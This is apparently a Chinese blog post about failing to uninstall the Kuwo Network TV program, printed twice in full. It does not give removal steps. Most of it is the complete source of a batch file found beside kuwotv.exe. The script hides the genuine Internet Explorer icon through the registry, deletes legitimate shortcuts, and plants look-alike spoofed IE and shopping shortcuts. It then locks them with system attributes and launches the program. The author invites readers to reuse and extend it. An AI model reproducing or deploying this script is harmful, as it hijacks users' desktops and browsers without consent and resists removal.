病毒是这样修炼的之如何清除酷我网络电视

 

 

某日，客户要求卸载酷我网络电视

按照一般卸载流程：

1. 在控制面板→添加/删除程序 内没有发现此程序身影

2. 在360程序管理中也没有找到其地方

3. 在使用ie修复工具（如超级兔子。。。）修复重启后，故障依然。

 

查看任务管理器后发现其进程： kuwotv.exe

搜索后，发现其路径为：

C:\windows\system32\ kuwotv.exe

使用其他

查看此目录下 还有kaijie.bat的运行文件，此文件源代码如下（大家参考哈，可以自己添加很多东西哦！！！）：

 

cls

@echo off

Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu" /v "{871C5380-42A0-1069-A2EA-08002B30309D}" /t "REG_DWORD" /d "1" /f

Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel" /v "{871C5380-42A0-1069-A2EA-08002B30309D}" /t "REG_DWORD" /d "1" /f

Set "TMPINF=C:\TmpInf.inf"

echo [Version] >%TMPINF%

echo Signature="$Windows NT$" >>%TMPINF%

echo [DefaultInstall] >>%TMPINF%

RUNDLL32 SETUPAPI.DLL,InstallHinfSection DefaultInstall 128 %TMPINF%

del %TMPINF%

 

 

 del "%userprofile%\ 桌面\IEXPLORE.lnk"

del "%userprofile%\ 桌面\IEXPLOREr.lnk"

del "%userprofile%\ 桌面\Internet Exporer.lnk"

del "%userprofile%\ 桌面\Internet Explorer.lnk"

del "%userprofile%\ 桌面\Internet Exp1orer.lnk"

del "%userprofile%\ 桌面\Internet Explorer.lnk"

del "%userprofile%\ 桌面\Internet*.lnk"  /f/q/a

del "%userprofile%\ 桌面\*Internet*.lnk" /f/q/a

 

 

 

del "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\*.url" /f/q/a

del "%userprofile%\ 桌面\*.url"     /f/q/a

 

 

copy "Internet ExpIorer.lnk" "%userprofile%\ 桌面\Internet Expleror.lnk" /y

 

 

copy "Internet ExpIorer.lnk" "%userprofile%\ 「开始」菜单\网址之家.lnk" /y

copy " 淘宝购物.lnk" "%userprofile%\「开始」菜单\淘宝购物.lnk" /y

copy " 免费电影.lnk" "%userprofile%\「开始」菜单\免费电影.lnk" /y

copy "FilmTVkk.lnk" "%userprofile%\ 「开始」菜单\酷我网络电视.lnk" /y

copy "yx.lnk" "%userprofile%\ 「开始」菜单\小游戏.lnk" /y

 

 

copy "FilmTVkk.lnk" "%userprofile%\ 「开始」菜单\程序\酷我网络电视.lnk" /y

copy "Internet ExpIorer.lnk" "%userprofile%\ 「开始」菜单\程序\Internet ExpIorer.lnk" /y

copy "Internet ExpIorer.lnk" "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\ 启动 Internet Explorrer 浏览器.lnk" /y

 

 copy "FilmTVkk.lnk" "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\ 酷我网络电视.lnk" /y

 copy "yx.lnk" "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\ 小游戏.lnk" /y

 

 

 

copy "taobao.lnk" "%userprofile%\Favorites\ 淘宝购物.lnk" /y

copy " 免费电影.lnk" "%userprofile%\Favorites\免费电影.lnk" /y

copy "yx.lnk" "%userprofile%\Favorites\ 小游戏.lnk" /y

copy "Internet ExpIorer.lnk" "%userprofile%\Favorites\ 酷站大全.lnk" /y

 

 start kuwotv.exe

  attrib  "%USERPROFILE%\ 桌面\Internet Expleror.lnk"  +R +S

 

 attrib "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\*.lnk"  +R +S

 

attrib  "%userprofile%\ 「开始」菜单\网址之家.lnk" +R +S

attrib  "%userprofile%\ 「开始」菜单\淘宝购物.lnk" +R +S

attrib  "%userprofile%\ 「开始」菜单\免费电影.lnk" +R +S

attrib  "%userprofile%\ 「开始」菜单\酷我网络电视.lnk" +R +S

attrib  "%userprofile%\ 「开始」菜单\小游戏.lnk" +R +S

 

exit

病毒是这样修炼的之如何清除酷我网络电视

 

某日，客户要求卸载酷我网络电视

按照一般卸载流程：

1. 在控制面板→添加/删除程序 内没有发现此程序身影

2. 在360程序管理中也没有找到其地方

3. 在使用ie修复工具（如超级兔子。。。）修复重启后，故障依然。

 

查看任务管理器后发现其进程： kuwotv.exe

搜索后，发现其路径为：

C:\windows\system32\ kuwotv.exe

使用其他

查看此目录下 还有kaijie.bat的运行文件，此文件源代码如下（大家参考哈，可以自己添加很多东西哦！！！）：

 

cls

@echo off

Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu" /v "{871C5380-42A0-1069-A2EA-08002B30309D}" /t "REG_DWORD" /d "1" /f

Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel" /v "{871C5380-42A0-1069-A2EA-08002B30309D}" /t "REG_DWORD" /d "1" /f

Set "TMPINF=C:\TmpInf.inf"

echo [Version] >%TMPINF%

echo Signature="$Windows NT$" >>%TMPINF%

echo [DefaultInstall] >>%TMPINF%

RUNDLL32 SETUPAPI.DLL,InstallHinfSection DefaultInstall 128 %TMPINF%

del %TMPINF%

 

 

 del "%userprofile%\ 桌面\IEXPLORE.lnk"

del "%userprofile%\ 桌面\IEXPLOREr.lnk"

del "%userprofile%\ 桌面\Internet Exporer.lnk"

del "%userprofile%\ 桌面\Internet Explorer.lnk"

del "%userprofile%\ 桌面\Internet Exp1orer.lnk"

del "%userprofile%\ 桌面\Internet Explorer.lnk"

del "%userprofile%\ 桌面\Internet*.lnk"  /f/q/a

del "%userprofile%\ 桌面\*Internet*.lnk" /f/q/a

 

 

 

del "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\*.url" /f/q/a

del "%userprofile%\ 桌面\*.url"     /f/q/a

 

 

copy "Internet ExpIorer.lnk" "%userprofile%\ 桌面\Internet Expleror.lnk" /y

 

 

copy "Internet ExpIorer.lnk" "%userprofile%\ 「开始」菜单\网址之家.lnk" /y

copy " 淘宝购物.lnk" "%userprofile%\「开始」菜单\淘宝购物.lnk" /y

copy " 免费电影.lnk" "%userprofile%\「开始」菜单\免费电影.lnk" /y

copy "FilmTVkk.lnk" "%userprofile%\ 「开始」菜单\酷我网络电视.lnk" /y

copy "yx.lnk" "%userprofile%\ 「开始」菜单\小游戏.lnk" /y

 

 

copy "FilmTVkk.lnk" "%userprofile%\ 「开始」菜单\程序\酷我网络电视.lnk" /y

copy "Internet ExpIorer.lnk" "%userprofile%\ 「开始」菜单\程序\Internet ExpIorer.lnk" /y

copy "Internet ExpIorer.lnk" "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\ 启动 Internet Explorrer 浏览器.lnk" /y

 

 copy "FilmTVkk.lnk" "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\ 酷我网络电视.lnk" /y

 copy "yx.lnk" "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\ 小游戏.lnk" /y

 

 

 

copy "taobao.lnk" "%userprofile%\Favorites\ 淘宝购物.lnk" /y

copy " 免费电影.lnk" "%userprofile%\Favorites\免费电影.lnk" /y

copy "yx.lnk" "%userprofile%\Favorites\ 小游戏.lnk" /y

copy "Internet ExpIorer.lnk" "%userprofile%\Favorites\ 酷站大全.lnk" /y

 

 start kuwotv.exe

  attrib  "%USERPROFILE%\ 桌面\Internet Expleror.lnk"  +R +S

 

 attrib "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\*.lnk"  +R +S

 

attrib  "%userprofile%\ 「开始」菜单\网址之家.lnk" +R +S

attrib  "%userprofile%\ 「开始」菜单\淘宝购物.lnk" +R +S

attrib  "%userprofile%\ 「开始」菜单\免费电影.lnk" +R +S

attrib  "%userprofile%\ 「开始」菜单\酷我网络电视.lnk" +R +S

attrib  "%userprofile%\ 「开始」菜单\小游戏.lnk" +R +S

 

exit